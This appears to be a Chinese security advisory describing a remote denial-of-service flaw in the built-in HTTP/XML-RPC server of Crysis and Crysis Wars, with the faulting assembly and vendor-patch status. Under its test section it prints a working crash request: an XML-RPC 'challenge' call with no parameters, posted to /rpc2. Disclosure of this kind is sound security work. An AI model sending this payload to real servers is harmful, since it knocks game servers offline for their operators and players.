安全研究
安全漏洞
Crysis HTTP/XML-RPC服务远程拒绝服务漏洞
发布日期:2009-07-20
更新日期:2009-07-21
受影响系统:Electronic Arts Crysis <= 1.21
Electronic Arts Crysis Wars <= 1.5
描述:
BUGTRAQ ID:
35735
Crysis是由Crytek开发的第一人称射击游戏。
Crysis内置的HTTP/XML-RPC服务器没有正确地验证用户所提交的请求,如果远程攻击者提交了缺少参数的恶意请求的话,就会导致XML RPC命令的处理代码试图使用未初始化的指针:
MOV EAX,DWORD PTR DS:[ECX]
MOV EDX,DWORD PTR DS:[EAX+14] ; access violation
PUSH cryactio.3075F2A0 ; ASCII "params"
CALL EDX
这会导致服务器立即崩溃。
<*来源:Luigi Auriemma (
aluigi@pivx.com)
链接:
http://secunia.com/advisories/35814/
http://aluigi.altervista.org/adv/crysisviol-adv.txt?esohkb
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /rpc2 HTTP/1.1
Content-Length: 90
<?xml version="1.0"?>
<methodCall>
<methodName>challenge</methodName>
</methodCall>
建议:
厂商补丁:
Electronic Arts
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ea.com浏览次数:17740
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |